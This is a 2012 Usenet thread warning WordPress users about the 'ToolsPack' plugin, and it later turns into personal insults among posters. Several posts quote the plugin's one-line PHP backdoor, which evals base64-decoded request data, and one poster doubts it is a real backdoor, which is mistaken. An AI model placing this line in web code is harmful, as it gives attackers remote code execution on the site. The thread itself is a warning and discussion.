Wordpress malware

[Han]

My son alerts everyone for this backdoor malware:

Please, people, for the love of WordPress...DO NOT install the 'ToolsPack'
plugin. It's pure malware.

Explained here:
http://blog.sucuri.net/2012/02/new-w...ck-plugin.html

I have no relevant knowledge myself, but trust my son, so please evaluate
yourselves!
--
Best regards
Han
email address is invalid

[VanguardLH]

Han wrote:

> My son alerts everyone for this backdoor malware:
>
> Please, people, for the love of WordPress...DO NOT install the 'ToolsPack'
> plugin. It's pure malware.
>
> Explained here:
> http://blog.sucuri.net/2012/02/new-w...ck-plugin.html
>
> I have no relevant knowledge myself, but trust my son, so please evaluate
> yourselves!

If your "son" claims sufficient expertise to declare some software as
malware then your son also has sufficient expertise to post here himself
along with including details of the behavior of the pest. Your report
here is heresay and provides no useful info about the claimed pest. Bad
code or unwanted behavior does not dictate malware. There is tons of
crap code out there but it's not malware, just crapware.

The plugin, as noted in the referenced article, has only a single line
of PHP code. It affects ONLY the site that choose to install this
server-side code.

$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) )

From http://php.net/manual/en/reserved.variables.request.php, I'm not
sure how the line in the referenced article could be considered a
backdoor unless there is a bug in the PHP interpreter itself. Being a
global variable doesn't alone make for a backdoor but the scope of the
variable could mean code gets injected out of the intended local scope.
It looks like if the contents of GET, POST, or COOKIE are not null then
the expression gets evaluated (which is the Base64 decoding of what got
retrieved from the client). eval interpretes what gets retrieved from
the client and apparently that could be PHP command(s) (which would run
under global scope). From what I've found in a quick search, this isn't
the only PHP or other-script backdoor to compromise a *site*. It's up
to the web designer to know what code they are putting up there, and
this one was damn short for easy interrogation before deployment.

This is possible a server security issue at a site. It is not malware
to clients.

[Han]

VanguardLH <V@nguard.LH> wrote in news:jjbbak$ul3$1@news.albasani.net:

> Han wrote:
>
>> My son alerts everyone for this backdoor malware:
>>
>> Please, people, for the love of WordPress...DO NOT install the
>> 'ToolsPack' plugin. It's pure malware.
>>
>> Explained here:
>> http://blog.sucuri.net/2012/02/new-w...ck-plugin.html
>>
>> I have no relevant knowledge myself, but trust my son, so please
>> evaluate yourselves!
>
> If your "son" claims sufficient expertise to declare some software as
> malware then your son also has sufficient expertise to post here
> himself along with including details of the behavior of the pest.
> Your report here is heresay and provides no useful info about the
> claimed pest. Bad code or unwanted behavior does not dictate malware.
> There is tons of crap code out there but it's not malware, just
> crapware.
>
> The plugin, as noted in the referenced article, has only a single line
> of PHP code. It affects ONLY the site that choose to install this
> server-side code.
>
> $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) )
>
> From http://php.net/manual/en/reserved.variables.request.php, I'm not
> sure how the line in the referenced article could be considered a
> backdoor unless there is a bug in the PHP interpreter itself. Being a
> global variable doesn't alone make for a backdoor but the scope of the
> variable could mean code gets injected out of the intended local
> scope. It looks like if the contents of GET, POST, or COOKIE are not
> null then the expression gets evaluated (which is the Base64 decoding
> of what got retrieved from the client). eval interpretes what gets
> retrieved from the client and apparently that could be PHP command(s)
> (which would run under global scope). From what I've found in a quick
> search, this isn't the only PHP or other-script backdoor to compromise
> a *site*. It's up to the web designer to know what code they are
> putting up there, and this one was damn short for easy interrogation
> before deployment.
>
> This is possible a server security issue at a site. It is not malware
> to clients.

Wordpress is some kind of blogging software <http://wordpress.org/>.
With the highly touted plugins they claim to have available, you seem to
be able to build a website yourself, so if the code you use is buggy or
malware (as this may or may not be), that may introduce some really bad
stuff in your personalized website. As you may know, there is a huge
proliferation of these types of sites, and it wouldn't surprise me if
malware authors would like to put some universally applicable creepy
backdoors in these DIY sites. Undoubtedly some of the websites will have
ways to collect money for purchases. Hmmm.


--
Best regards
Han
email address is invalid

[VanguardLH]

Han wrote:

> VanguardLH <V@nguard.LH> wrote in news:jjbbak$ul3$1@news.albasani.net:
>
>> Han wrote:
>>
>>> My son alerts everyone for this backdoor malware:
>>>
>>> Please, people, for the love of WordPress...DO NOT install the
>>> 'ToolsPack' plugin. It's pure malware.
>>>
>>> Explained here:
>>> http://blog.sucuri.net/2012/02/new-w...ck-plugin.html
>>>
>>> I have no relevant knowledge myself, but trust my son, so please
>>> evaluate yourselves!
>>
>> If your "son" claims sufficient expertise to declare some software as
>> malware then your son also has sufficient expertise to post here
>> himself along with including details of the behavior of the pest.
>> Your report here is heresay and provides no useful info about the
>> claimed pest. Bad code or unwanted behavior does not dictate malware.
>> There is tons of crap code out there but it's not malware, just
>> crapware.
>>
>> The plugin, as noted in the referenced article, has only a single line
>> of PHP code. It affects ONLY the site that choose to install this
>> server-side code.
>>
>> $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) )
>>
>> From http://php.net/manual/en/reserved.variables.request.php, I'm not
>> sure how the line in the referenced article could be considered a
>> backdoor unless there is a bug in the PHP interpreter itself. Being a
>> global variable doesn't alone make for a backdoor but the scope of the
>> variable could mean code gets injected out of the intended local
>> scope. It looks like if the contents of GET, POST, or COOKIE are not
>> null then the expression gets evaluated (which is the Base64 decoding
>> of what got retrieved from the client). eval interpretes what gets
>> retrieved from the client and apparently that could be PHP command(s)
>> (which would run under global scope). From what I've found in a quick
>> search, this isn't the only PHP or other-script backdoor to compromise
>> a *site*. It's up to the web designer to know what code they are
>> putting up there, and this one was damn short for easy interrogation
>> before deployment.
>>
>> This is possible a server security issue at a site. It is not malware
>> to clients.
>
> Wordpress is some kind of blogging software <http://wordpress.org/>.
> With the highly touted plugins they claim to have available, you seem to
> be able to build a website yourself, so if the code you use is buggy or
> malware (as this may or may not be), that may introduce some really bad
> stuff in your personalized website. As you may know, there is a huge
> proliferation of these types of sites, and it wouldn't surprise me if
> malware authors would like to put some universally applicable creepy
> backdoors in these DIY sites. Undoubtedly some of the websites will have
> ways to collect money for purchases. Hmmm.

I haven't found a Wordpress-based site that I cared to remember. I only
know of them by accidental visits: something I clicked on took me to one
of these garbage sites and I immediately left. I'm not interested in
someone's blog to stroke their ego in public or pretend it's a news or
help site. I don't waste my time with Facebook, either.

There are lots of vulnerabilities listed by Secunia for the plug-ins and
even for Wordpress itself. Backdoors have been present since the
introduction of WordPress. With somewhere around 18,000 plug-ins, I
doubt there's any real quality checking going on. I find the less
number of Firefox extensions to have a lot of garbage there, too.

[Dustin]

VanguardLH <V@nguard.LH> wrote in news:jjc9ao$698$1@news.albasani.net:

> me to one of these garbage sites and I immediately left. I'm not
> interested in someone's blog to stroke their ego in public or pretend
> it's a news or help site. I don't waste my time with Facebook,

Just your own right? You know, the typical arrogant remarks you tend to
make, only to be corrected for it later in the thread.

> doubt there's any real quality checking going on. I find the less
> number of Firefox extensions to have a lot of garbage there, too.

Yes, and the consistent pissing and moaning you do. It's annoying. If you
find such terrible problems in everything you try or site you visit,
consider writing and supporting your own software and or your own website.

You just seem like an arrogant self righteous ungrateful ****in prick. You
don't actually mean to come across that way, right?


--
Character is doing the right thing when nobody's looking. There are too
many people who think that the only thing that's right is to get by, and
the only thing that's wrong is to get caught. - J.C. Watts

[Aardvark]

On Fri, 09 Mar 2012 16:41:59 +0000, Dustin wrote:

> VanguardLH <V@nguard.LH> wrote in news:jjc9ao$698$1@news.albasani.net:
>
>> me to one of these garbage sites and I immediately left. I'm not
>> interested in someone's blog to stroke their ego in public or pretend
>> it's a news or help site. I don't waste my time with Facebook,
>
> Just your own right? You know, the typical arrogant remarks you tend to
> make, only to be corrected for it later in the thread.
>
>> doubt there's any real quality checking going on. I find the less
>> number of Firefox extensions to have a lot of garbage there, too.
>
> Yes, and the consistent pissing and moaning you do. It's annoying. If
> you find such terrible problems in everything you try or site you visit,
> consider writing and supporting your own software and or your own
> website.
>
> You just seem like an arrogant self righteous ungrateful ****in prick.
> You don't actually mean to come across that way, right?

And very wordy, Dustin. You forgot that bit.

:-)



--
"Any man's death diminishes me, because I am involved
in mankind, and therefore never send to know for whom
the bell tolls; it tolls for thee".
-John Donne (1572-1631)

[Timmy]

Aardvark wrote...

>
> On Fri, 09 Mar 2012 16:41:59 +0000, Dustin wrote:
>
> > VanguardLH <V@nguard.LH> wrote in news:jjc9ao$698$1@news.albasani.net:
> >
> >> me to one of these garbage sites and I immediately left. I'm not
> >> interested in someone's blog to stroke their ego in public or pretend
> >> it's a news or help site. I don't waste my time with Facebook,
> >
> > Just your own right? You know, the typical arrogant remarks you tend to
> > make, only to be corrected for it later in the thread.
> >
> >> doubt there's any real quality checking going on. I find the less
> >> number of Firefox extensions to have a lot of garbage there, too.
> >
> > Yes, and the consistent pissing and moaning you do. It's annoying. If
> > you find such terrible problems in everything you try or site you visit,
> > consider writing and supporting your own software and or your own
> > website.
> >
> > You just seem like an arrogant self righteous ungrateful ****in prick.
> > You don't actually mean to come across that way, right?
>
> And very wordy, Dustin. You forgot that bit.
>
> :-)


AOL

[VanguardLH]

Dustin wrote:

> VanguardLH <V@nguard.LH> wrote in news:jjc9ao$698$1@news.albasani.net:
>
>> me to one of these garbage sites and I immediately left. I'm not
>> interested in someone's blog to stroke their ego in public or pretend
>> it's a news or help site. I don't waste my time with Facebook,
>
> Just your own right? You know, the typical arrogant remarks you tend to
> make, only to be corrected for it later in the thread.
>
>> doubt there's any real quality checking going on. I find the less
>> number of Firefox extensions to have a lot of garbage there, too.
>
> Yes, and the consistent pissing and moaning you do. It's annoying. If you
> find such terrible problems in everything you try or site you visit,
> consider writing and supporting your own software and or your own website.
>
> You just seem like an arrogant self righteous ungrateful ****in prick. You
> don't actually mean to come across that way, right?

Oh, and of course, your whining is so much more enlightening. Stop
whining about my whining.

Reminds me of the joke where there are two fat ladies in a bakery shop.
One turns to the other and says, "Everytime I'm in here I see you here."

[Dustin]

VanguardLH <V@nguard.LH> wrote in news:jjdopn$9jq$1@news.albasani.net:

> Dustin wrote:
>
>> VanguardLH <V@nguard.LH> wrote in
>> news:jjc9ao$698$1@news.albasani.net:
>>
>>> me to one of these garbage sites and I immediately left. I'm not
>>> interested in someone's blog to stroke their ego in public or
>>> pretend it's a news or help site. I don't waste my time with
>>> Facebook,
>>
>> Just your own right? You know, the typical arrogant remarks you tend
>> to make, only to be corrected for it later in the thread.
>>
>>> doubt there's any real quality checking going on. I find the less
>>> number of Firefox extensions to have a lot of garbage there, too.
>>
>> Yes, and the consistent pissing and moaning you do. It's annoying.
>> If you find such terrible problems in everything you try or site you
>> visit, consider writing and supporting your own software and or your
>> own website.
>>
>> You just seem like an arrogant self righteous ungrateful ****in
>> prick. You don't actually mean to come across that way, right?
>
> Oh, and of course, your whining is so much more enlightening. Stop
> whining about my whining.

Cite message IDs where I've been whining please. Off the top of my head,
I can think of several of yours. The hijackthis complaint being the best
one so far.

> Reminds me of the joke where there are two fat ladies in a bakery
> shop. One turns to the other and says, "Everytime I'm in here I see
> you here."

Doesn't really apply. You'd be the fat lady munching a pie, I'd be the
happy baker accepting your money for it. I guess the lady your talking
too is a friend? Maybe the two of you can carpool and combine funds to
take some cheap computer classes.





--
Character is doing the right thing when nobody's looking. There are too
many people who think that the only thing that's right is to get by, and
the only thing that's wrong is to get caught. - J.C. Watts